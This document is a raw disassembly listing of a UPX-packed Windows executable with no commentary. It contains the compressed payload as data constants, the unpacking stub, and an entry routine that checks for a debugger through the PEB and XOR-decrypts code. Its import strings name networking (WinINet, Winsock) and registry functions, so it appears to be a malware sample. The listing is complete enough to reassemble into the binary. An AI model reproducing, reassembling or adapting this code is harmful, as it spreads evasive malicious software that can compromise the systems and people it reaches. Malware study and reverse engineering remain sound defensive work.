dd 23930CA0h, 0CB1C803h, 780CA000h, 88BFEF92h, 90040h
dd 703ECh, 8A401495h, 4F47B06Ch, 0BF40707Ch, 8FFC0700h
dd 13435EC8h, 138578h, 0E9A65BABh, 279E409Ch, 2FF81013h
dd 4583FEFFh, 230EF18Dh, 0DD08FE40h, 840C1D27h, 10B94388h
dd 9301FFEEh, 0B83E4F27h, 0AD200C10h, 1F215E0Dh, 0F7F0766h
dd 900118D8h, 7059F257h, 0F840F84h, 0F9006FC9h, 2000F95h
dd 4A0F847Fh, 6CE4D878h
dd 0A89A000Fh, 0EC88C06Fh, 0A1343ADh, 1F93FCACh, 50586E69h
dd 725020h, 6DB3C844h, 39014446h, 0C8406B32h, 123CFC93h
dd 41027515h, 21CA0053h, 941CD7B2h, 0FF06EB01h, 0C6FFF9BFh
dd 73255C5Ch, 6370695Ch, 0EC816624h, 0E4FF071Ch, 44655300h
dd 8F756265h, 67975351h, 67997669h, 6A6441A7h, 0A3752D93h
dd 6F546175h, 73176EE0h, 36DC93FBh, 75126F4Ch, 6C615670h
dd 17416575h, 0B7EDB1A9h, 6F28704Fh, 34732463h, 62A4300h
dd 61761D4Bh, 5E3333Fh, 79546CA2h, 0BAD06D4Ch, 65A37F12h
dd 72545F11h, 35577961h, 0A5B74317h, 6131A5B6h, 6F68521Ah
dd 6B685405h, 0C73AA54h, 0DB735614h, 6EA66D58h, 4F28416Dh
dd 3A777845h, 0F4BE8D6Eh, 0F54735ACh, 54481EF3h, 0BD7F5054h
dd 3C12E25Fh, 20573220h, 0A0D4B4Fh, 56B76D01h, 449F4BEAh
dd 44C2D02h, 0ECD94B67h, 203AA55Bh, 2F187525h, 6B5B5628h
dd 0B579540Fh, 0AE70A326h, 0D4CDAB51h, 2F158363h, 3DCAD602h
dd 932DC7D5h, 57C7C972h, 3168546Bh, 0F42B0047h, 0F74AFFF6h
dd 0CBE56468h, 736D8D73h, 6A716376h, 0CBA96859h, 34F16977h
dd 36EFB9Bh, 75175F32h, 323303E7h, 0D34B7677h, 17393031h
dd 64D10038h, 73E4190h, 4A303132h, 341D484Dh, 883AAF78h
dd 0D67FFCAAh, 4F537795h, 41575446h, 4D5C4552h, 62C1FB69h
dd 936FBDDBh, 435C7B5Ch, 0D1727275h, 0A015DC38h, 5CC68E56h
dd 37807552h, 98B0ED0Ch, 1B63B855h, 9B956664h, 7361FF90h
dd 647A6E68h, 536C6473h, 25B0C149h, 0E57BAECh, 9B53016Ch
dd 1A42B95Bh, 4449B757h, 0E0D02053h, 243806Eh, 0DD762067h
dd 0D9EE76DFh, 2408CADBh, 20639D32h, 0F6421053h, 65446D92h
dd 0E3871A1Bh, 23CB7337h, 79831217h, 0A35A1473h, 4200F1B1h
dd 5632007h, 0B8D6A123h, 6D1B13C5h, 56061C20h, 580C02C6h
dd 20844437h, 0B9EC96B2h, 672F66DBh, 632A9C6Dh, 0FF6B1124h
dd 690A63C2h, 4D207974h, 1A1E6E61h, 3B08A6BAh, 53C400A6h
dd 836DE340h, 0A846B471h, 0DC10C65h, 0D2DB1B8h, 6F4D1B47h
dd 74DB704Fh, 334665D3h, 306D614Eh, 72D36C01h, 0E0BBDC63h
dd 530A5D1Ah, 0A197970h, 0E1B724D2h, 3265F0C5h, 6D854916h
dd 6C6FE9A3h, 5354702Fh, 0D6BB70CCh, 1B0AD482h, 32126419h
dd 8575335Ch, 57540FEBh, 30B62C35h, 2118C160h, 69747C4Eh
dd 0B5D0EE4h, 2B495D61h, 0DA1D8791h, 0A644FB6h, 6A3C6163h
dd 0F0B0B045h, 810C76B9h, 6D463C61h, 0DEDBA553h, 4F91B44Ah
dd 748C6A62h, 85827214h, 2DBC62E6h, 0D48D83Fh, 0AA562F7Bh
dd 0D1183A0Ch, 0B61DEE09h, 61DB6E08h, 85C4F94Dh, 44C74359h
dd 79C5634Fh, 0A575E114h, 2B1F6B5Ah, 530F3284h, 0BB26CC60h
dd 0A7706509h, 0BBD0216Eh, 0D4B25CF5h, 64960B12h, 6BD90F72h
dd 4C2311FCh, 52026269h, 6D7356A0h, 6D4D2BB0h, 6C911367h
dd 82021016h, 612E63BAh, 4D54E361h, 4757C6Bh, 61ACD94Dh
dd 4178A5BBh, 8B0D8E0Dh, 5DB25ED0h, 622D39AFh, 30879587h
dd 31784538h, 4DCF0B52h, 652E0570h, 5B7A4E08h, 65B36070h
dd 0BB4C9122h, 5B4C1045h, 0DADE66Bh, 0CF496D44h, 5A46C9BEh
dd 986747D1h, 116654Bh, 4579CEE7h, 0F747D10h, 1DAD612Fh
dd 11ED0A51h, 2CD8B395h, 215A3060h, 0F6ED0810h, 0C51C20Eh
dd 0A07B6241h, 2056A6B1h, 6E40FB97h, 0D9D730FDh, 77741602h
dd 0FE103048h, 0A5F6D9Ah, 0E611244h, 79666969h, 0D8EB586Dh
dd 757A67D7h, 0BD6C362Bh, 0C50DBD85h, 112C796Fh, 0C2140E6Fh
dd 8F52109Dh, 0E43683C1h, 149F3D9Fh, 75716341h, 164D7269h
dd 491D2B9Ch, 133AA020h, 0F0CDB4DEh, 7273E869h, 0B26D06C1h
dd 73862C5Ah, 0F740E2Ch, 76856E53h, 5F1D4DE6h, 5F3F6544h
dd 0CC5CC68h, 27ACED1Ch, 0B38A0702h, 0A5636150h, 98CCE90Fh
dd 46AF6AE5h, 0D8143C38h, 0FC740330h, 1415C165h, 0B309841Bh
dd 49C1DE0Ah, 0C2B76C66h, 5706F96h, 4F4166B1h, 0A441C1F4h
dd 0D6420D3h, 0B0B60285h, 419B55EDh, 1B830E11h, 14499096h
dd 0C332036Bh, 2B6E5325h, 817453A3h, 48B1151Ah, 96C054C6h
dd 2F36D965h, 20273FFh, 5939010Dh, 6F596596h, 90C1734h
dd 65965951h, 16101304h, 83AB66F3h, 494550E9h, 0D20D7C4Ch
dd 0E5F46C40h, 1E0FDA1h, 7406010Bh, 0F60B1124h, 22DF13ECh
dd 12D9250Bh, 0BF74AFAh, 7607FD02h, 50BD96E6h, 10341E0Ch
dd 0F65E0507h, 94000606h, 0DDB0862Ch, 648C9080h, 581E0178h
dd 2EAE3C03h, 90230A55h, 3464609Bh, 452CA24h, 0B720BEE0h
dd 0E1642EC7h, 2B0FF4FBh, 0DD7E2528h, 0C01627C2h, 152E9804h
dd 98000000h, 1200AEh, 0FF00h, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_30905000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_30906B22
; ---------------------------------------------------------------------------
align 8
loc_30906B18: ; CODE XREF: UPX1:loc_30906B29�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_30906B1E: ; CODE XREF: UPX1:30906BB6�j
; UPX1:30906BCD�j
add ebx, ebx
jnz short loc_30906B29
loc_30906B22: ; CODE XREF: UPX1:30906B10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B29: ; CODE XREF: UPX1:30906B20�j
jb short loc_30906B18
mov eax, 1
loc_30906B30: ; CODE XREF: UPX1:30906B3F�j
; UPX1:30906B4A�j
add ebx, ebx
jnz short loc_30906B3B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B3B: ; CODE XREF: UPX1:30906B32�j
adc eax, eax
add ebx, ebx
jnb short loc_30906B30
jnz short loc_30906B4C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B30
loc_30906B4C: ; CODE XREF: UPX1:30906B41�j
xor ecx, ecx
sub eax, 3
jb short loc_30906B60
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_30906BD2
mov ebp, eax
loc_30906B60: ; CODE XREF: UPX1:30906B51�j
add ebx, ebx
jnz short loc_30906B6B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B6B: ; CODE XREF: UPX1:30906B62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_30906B78
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B78: ; CODE XREF: UPX1:30906B6F�j
adc ecx, ecx
jnz short loc_30906B9C
inc ecx
loc_30906B7D: ; CODE XREF: UPX1:30906B8C�j
; UPX1:30906B97�j
add ebx, ebx
jnz short loc_30906B88
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B88: ; CODE XREF: UPX1:30906B7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_30906B7D
jnz short loc_30906B99
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B7D
loc_30906B99: ; CODE XREF: UPX1:30906B8E�j
add ecx, 2
loc_30906B9C: ; CODE XREF: UPX1:30906B7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_30906BBC
loc_30906BAD: ; CODE XREF: UPX1:30906BB4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_30906BAD
jmp loc_30906B1E
; ---------------------------------------------------------------------------
align 4
loc_30906BBC: ; CODE XREF: UPX1:30906BAB�j
; UPX1:30906BC9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_30906BBC
add edi, ecx
jmp loc_30906B1E
; ---------------------------------------------------------------------------
loc_30906BD2: ; CODE XREF: UPX1:30906B5C�j
pop esi
mov edi, esi
mov ecx, 85h
loc_30906BDA: ; CODE XREF: UPX1:30906BE1�j
; UPX1:30906BE6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_30906BDF: ; CODE XREF: UPX1:30906C04�j
cmp al, 1
ja short loc_30906BDA
cmp byte ptr [edi], 1
jnz short loc_30906BDA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_30906BDF
lea edi, [esi+4000h]
loc_30906C0C: ; CODE XREF: UPX1:30906C2E�j
mov eax, [edi]
or eax, eax
jz short loc_30906C57
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_30906C29: ; CODE XREF: UPX1:30906C4F�j
mov al, [edi]
inc edi
or al, al
jz short loc_30906C0C
mov ecx, edi
jns short near ptr loc_30906C3A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_30906C3A: ; CODE XREF: UPX1:30906C32�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_30906C51
mov [ebx], eax
add ebx, 4
jmp short loc_30906C29
; ---------------------------------------------------------------------------
loc_30906C51: ; CODE XREF: UPX1:30906C48�j
call dword ptr [esi+6094h]
loc_30906C57: ; CODE XREF: UPX1:30906C10�j
popa
jmp loc_309022DF
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 30907000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C3528Dh, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3090725F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3090720F�j
jmp short near ptr loc_3090720A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3090725E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3090724D: ; CODE XREF: UPX2:3090725C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3090724D
locret_3090725E: ; CODE XREF: UPX2:30907220�j
retn
; ---------------------------------------------------------------------------
loc_3090725F: ; CODE XREF: UPX2:30907201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], dl
; ---------------------------------------------------------------------------
db 2 dup(0), 6Bh
dd 0
db 90h
db 30h, 0, 1Eh
dd 280000h, 760h dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 30909000h
align 2000h
_idata2 ends
end start